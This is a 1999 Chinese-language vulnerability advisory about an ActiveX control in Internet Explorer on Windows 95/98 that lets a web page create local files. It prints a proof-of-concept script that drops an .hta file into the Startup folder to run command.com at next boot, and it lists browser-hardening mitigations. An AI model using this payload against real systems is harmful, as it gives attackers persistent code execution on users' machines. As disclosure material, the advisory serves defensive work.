发布日期：1999-06-02
更新日期：1999-06-02

受影响系统：

Microsoft Windows 95
Microsoft Windows 98

不受影响系统：

Windows 2000 IE5.00.2919.800

描述：

---

这个漏洞主要就是AcriveX控件，它允许创建和覆写本地文件。黑客可以在IE用户点击网页上的一个超链接时发生，这个漏洞可以将HTML应用程序文件中的可执行程序添加在Windows 95或98计算机的开始菜单中，在该机器下次启动时，程序就会执行。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

这个漏洞可以用下面的代码来测试：

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>


建议：

---

1) 把安全级别设置为“High”
2) 或是把 Active Scripting 给屏蔽掉
3) 或把 ActiveX Controls 和 plug-ins 都给关了

浏览次数：9782
严重程度：0（网友投票）